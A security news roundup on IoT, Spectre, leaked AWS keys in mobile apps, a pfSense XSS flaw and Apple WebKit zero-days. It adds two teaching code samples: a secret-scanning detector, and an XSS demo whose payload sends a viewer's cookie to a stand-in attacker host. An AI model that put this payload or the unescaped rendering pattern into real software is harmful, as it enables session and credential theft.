Microsoft warns of vulnerabilities in dozens of IoT operating systems

Microsoft researchers have discovered multiple memory allocation and remote code execution vulnerabilities in the operating systems for a wide range of commercial, medical and operational technology Internet of Things devices. The reported flaws affect at least 25 different products made by more than a dozen organisations, including Amazon, ARM, Google Cloud, Samsung, Red Hat, Apache and others. No exploits leveraging the vulnerabilities have yet been spotted in the wild, but they give potential attackers a broad attack surface.

“Given the pervasiveness of IoT and OT devices, these vulnerabilities, if successfully exploited, represent a significant potential risk for organisations of all kinds,” Microsoft wrote.

Operational technology devices, meaning the internet-connected hardware and machinery that supports medical facilities, enterprise businesses or critical infrastructure, present substantially different challenges from their commercial counterparts. There are often technical obstacles to patching or updating, and any downtime can have more direct or serious consequences for the delivery of medical care, power, water and other essential services. Meanwhile, the US National Security Agency (NSA) has released a cybersecurity advisory on the security of operational technology (OT) systems, particularly their connectivity to IT systems. The advisory shares recommendations for evaluating risks and improving the security of connections between IT systems, which can often serve as an entry point into industrial networks, and OT systems.

“Each IT-OT connection increases the potential attack surface,” the NSA said. “To prevent dangerous results from OT exploitation, OT operators and IT system administrators should ensure only the most imperative IT-OT connections are allowed, and that these are hardened to the greatest extent possible.”

Ideally there should be no connections at all between enterprise networks and OT networks, but the agency acknowledges that in some cases such connections are necessary. Organisations should inventory these connections, remove any that are not truly required, and harden the remaining ones so that they cannot be abused in an attack.

Spectre side-channel attack concern returns

A paper published on Friday by a team of computer scientists from the University of Virginia and the University of California, San Diego argues that every current defence against Spectre side-channel attacks can be bypassed, leaving billions of computers and other devices as exposed today as they were when the hardware flaw was first announced three years ago. The new attack targets the micro-op cache, so it applies to all modern AMD and Intel processors that have one, including every Intel chip manufactured since 2011.

The vulnerability is called Spectre because it exploits speculative execution, the technique that makes modern chips as fast as they are: the processor's branch predictor guesses which instructions it is likely to execute next and fetches and runs them along the predicted path before the outcome of the branch is known.

The new line of attacks exploits the micro-op cache: an on-chip structure that speeds up execution by storing decoded, simple commands so the processor can fetch them quickly and early in the speculative execution pipeline, as the team explains in a write-up from the University of Virginia. The attacks defeat current defences because those defences only protect the processor at a later stage of speculative execution. The team was led by UVA Engineering Assistant Professor of Computer Science Ashish Venkat, who picked apart Intel's suggested defence against Spectre, the LFENCE instruction. That defence holds sensitive code in a waiting area until the security checks have executed, and only then allows the sensitive code to run, he explained.

“But it turns out the walls of this waiting area have ears, which our attack exploits. We show how an attacker can smuggle secrets through the micro-op cache by using it as a covert channel. It would be very difficult to create a focused attack looking for specific information,” he said. “Instead, attacks are expected to take the form of passive surveillance, collecting random information. That information is collected from deep inside the processor, though, and could contain anything processed by the computer.” 

The research team reported their findings to international chip makers in April and plan to present at the International Symposium on Computer Architecture, ISCA, which will be held virtually in June.

Leaking hardcoded private Amazon Web Services (AWS) keys

Most mobile app users tend to blindly trust that the apps they download from app stores are safe and secure. But that isn't always the case. The CloudSEK BeVigil search engine has identified over 40 apps – with more than a cumulative 100 million downloads – that had hardcoded private Amazon Web Services (AWS) keys embedded within them, putting their internal networks and their users' data at risk of cyberattacks. The AWS key leakage was spotted in some of the major apps such as Adobe Photoshop Fix, Adobe Comp, Hootsuite, IBM's Weather Channel, and online shopping services.

"AWS keys hardcoded in a mobile app source code can be a huge problem, especially if its Identity and Access Management role has wide scope and permissions," CloudSEK researchers said. "The possibilities for misuse are endless here, since the attacks can be chained and the attacker can gain further access to the whole infrastructure, even the code base and configurations."

CloudSEK said it responsibly disclosed these security concerns to AWS and the affected companies independently. In an app analysed by the cybersecurity firm, the exposed AWS key had access to multiple AWS services, including credentials for the S3 storage service, which in turn opened up access to 88 buckets containing 10,073,444 files and data amounting to 5.5 terabytes. Also included in the buckets were source code, application backups, user reports, test artefacts, configuration and credential files which could be used to gain deeper access to the app's infrastructure, including user databases.

"Hardcoded API keys are like locking your house but leaving the key in an envelope labelled 'Do not open,'" said Shahrukh Ahmad, CTO BeVigil. "These keys could easily be discovered by malicious hackers or competitors who could use them to compromise their data and networks."
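As an added example, not code from CloudSEK, BeVigil or any of the affected apps, the following Python scanner shows the check a practitioner would run over strings extracted from a decompiled app bundle: it matches the fixed shape of an AWS access key ID, looks for a 40-character secret next to a "secret"-style identifier, and applies a Shannon-entropy gate so that placeholder values are not reported. The regular expressions, the entropy threshold and the sample strings are assumptions made for this example; the key pair in the sample is the placeholder pair from AWS's own documentation, not a live credential.

```python
import math
import re
from collections import Counter
from typing import List, NamedTuple

# An AWS access key ID is a four-letter prefix plus 16 upper-case alphanumerics.
# AKIA marks a long-lived IAM user key, ASIA a temporary STS key. A secret access
# key is 40 characters from the base64 alphabet; on its own that shape is too
# common, so the pattern also requires a "secret"-style identifier before it.
# (Both patterns are assumptions made for this example.)
ACCESS_KEY_ID_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")
SECRET_KEY_RE = re.compile(
    r"(?i)secret[a-z_]*['\"]?\s*[:=]\s*['\"]?([A-Za-z0-9/+]{40})(?![A-Za-z0-9/+])"
)


class Finding(NamedTuple):
    line_no: int
    kind: str      # "access_key_id" or "secret_access_key"
    value: str


def shannon_entropy(s: str) -> float:
    """Bits per character; a real random secret scores well above a placeholder."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan(text: str, min_entropy: float = 3.5) -> List[Finding]:
    """Scan extracted strings (e.g. from a decompiled APK) for embedded AWS credentials."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for m in ACCESS_KEY_ID_RE.finditer(line):
            findings.append(Finding(line_no, "access_key_id", m.group(1)))
        for m in SECRET_KEY_RE.finditer(line):
            secret = m.group(1)
            # Entropy gate: drops obvious placeholders such as a run of zeros.
            if shannon_entropy(secret) >= min_entropy:
                findings.append(Finding(line_no, "secret_access_key", secret))
    return findings


def redact(value: str) -> str:
    """Never echo a whole credential into a report or a ticket."""
    return value[:4] + "*" * (len(value) - 8) + value[-4:]


# Constructed sample: lines as they might come out of `strings` on a decompiled
# app bundle. The key pair is the placeholder pair from AWS documentation; the
# third line is a low-entropy placeholder the entropy gate should ignore.
SAMPLE_STRINGS = """\
aws.accessKeyId=AKIAIOSFODNN7EXAMPLE
aws.secretKey=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
"secret_key": "0000000000000000000000000000000000000000"
analytics.endpoint=https://example.invalid/v1/track
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_STRINGS):
        print(f"line {f.line_no}: {f.kind} {redact(f.value)}")
```

Run it over the output of `strings` on an unpacked APK or IPA, or over the decompiled source tree. Any hit on a secret should be treated as a leaked credential: rotate the key first, then review the IAM policy attached to it, because the damage described above came from a key whose role reached S3 buckets, backups and configuration files rather than the single resource the app needed.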

XSS vulnerability patched in open source firewall pfSense

A severe cross-site scripting (XSS) vulnerability in pfSense has been patched by the vendor. Netgate's pfSense is open-source firewall and routing software based on FreeBSD, made available under the Apache 2.0 licence. The flaw, in the services_wol.php page (Wake-on-LAN) of the pfSense CE and pfSense Plus WebGUI, was discovered and reported by Fortinet Systems Engineer William Costa. Tracked as CVE-2021-27933, it was published on the Full Disclosure mailing list. To exploit the bug, an attacker injects code into the page's 'Description' parameter; because the value is not properly encoded on output, the injected JavaScript executes in the browser of anyone who views it. XSS comes in several flavours, the most severe being stored (persistent) XSS, in which the malicious input is saved by the application and served to every user who later views the affected page.

These bugs can be used to hijack browser sessions and bypass the same-origin policy, and attackers exploit them in a variety of scenarios including impersonating users, phishing, deploying malicious payloads, stealing credentials and user data, and potentially fully taking over a vulnerable application when the victim is highly privileged. Since the pfSense WebGUI is an administrative interface, anyone who views a stored payload there is likely to be an administrator. The fix was acknowledged in the release notes for pfSense 2.5.1 and pfSense Plus 21.02.2, which both contain the patch.
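The encoding failure described above, as an added example that is not pfSense's own code: a Python stand-in for a WebGUI page that stores a user-supplied Description and later renders it in a table, first with the value concatenated straight into the markup and then with it HTML-encoded at the point of output. The payload, the function names and the markup layout are constructed for this example; only the general rule, encode untrusted data for the context it lands in, is the page's point.

```python
import html
from html.parser import HTMLParser

# Constructed payload for this example: it closes the value="..." attribute and
# the <input> tag, then injects a script that sends the viewer's cookie away.
MALICIOUS_DESCRIPTION = (
    '"><script>location="https://attacker.invalid/?c="+document.cookie</script>'
)


def render_row_unsafe(description: str) -> str:
    """Vulnerable pattern: stored user input concatenated straight into HTML."""
    return (
        f'<tr><td><input name="descr" value="{description}"></td>'
        f"<td>{description}</td></tr>"
    )


def render_row_safe(description: str) -> str:
    """Hardened pattern: encode for the HTML context at the point of output.

    quote=True also encodes " and ', so the value cannot terminate the attribute.
    """
    enc = html.escape(description, quote=True)
    return f'<tr><td><input name="descr" value="{enc}"></td><td>{enc}</td></tr>'


class _BrowserView(HTMLParser):
    """Collects what a browser would parse: the tag sequence and the input's value."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            # The parser decodes entities, so an encoded value comes back intact.
            self.input_value = dict(attrs).get("value")


def browser_view(markup: str):
    """Return (tags, input_value) as the HTML parser sees the markup."""
    view = _BrowserView()
    view.feed(markup)
    view.close()
    return view.tags, view.input_value


if __name__ == "__main__":
    for name, render in (("unsafe", render_row_unsafe), ("safe", render_row_safe)):
        tags, value = browser_view(render(MALICIOUS_DESCRIPTION))
        print(f"{name}: script tag present={'script' in tags} input value={value!r}")
```

Parsing the rendered markup with the standard-library HTML parser shows the difference the way a browser would see it: in the unsafe rendering a script tag appears and the attribute value is cut short at the injected quote, while in the encoded rendering no new tag is created and the description survives unchanged as attribute value and text. In PHP the equivalent fix is to pass the value through htmlspecialchars($value, ENT_QUOTES) wherever it is emitted.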

Apple reports 2 iOS zero-days that let hackers compromise fully patched devices

A week after Apple issued its biggest iOS and iPadOS update since last September's release of version 14.0, the company has released a new update to patch two zero-days that allowed attackers to execute malicious code on fully up-to-date devices. Monday's release of version 14.5.1 also fixes a bug in the App Tracking Transparency feature introduced in the previous version. Both vulnerabilities reside in WebKit, the browser engine that renders web content in Safari, Mail, the App Store and other select apps on iOS and macOS, and which is also used on Linux. CVE-2021-30663 and CVE-2021-30665, as the zero-days are tracked, have now been patched. Last week, Apple fixed CVE-2021-30661, another code-execution flaw in iOS WebKit that also might have been actively exploited.

“Processing maliciously crafted web content may lead to arbitrary code execution,” Apple said in its security notes, referring to the flaws. “Apple is aware of a report that this issue may have been actively exploited.” MacOS 11.3.1, which Apple also released on Monday, also fixed CVE-2021-30663 and CVE-2021-30665.

CVE-2021-30665 was discovered by researchers from China-based security firm Qihoo 360; the other vulnerability was reported by an anonymous source. Apple gave no details about who is using the exploits or who is being targeted. Apple rolled out App Tracking Transparency in last week's release of iOS 14.5. The feature has roiled Facebook because it prevents the company's app from tracking user activity across other installed apps without explicit permission.
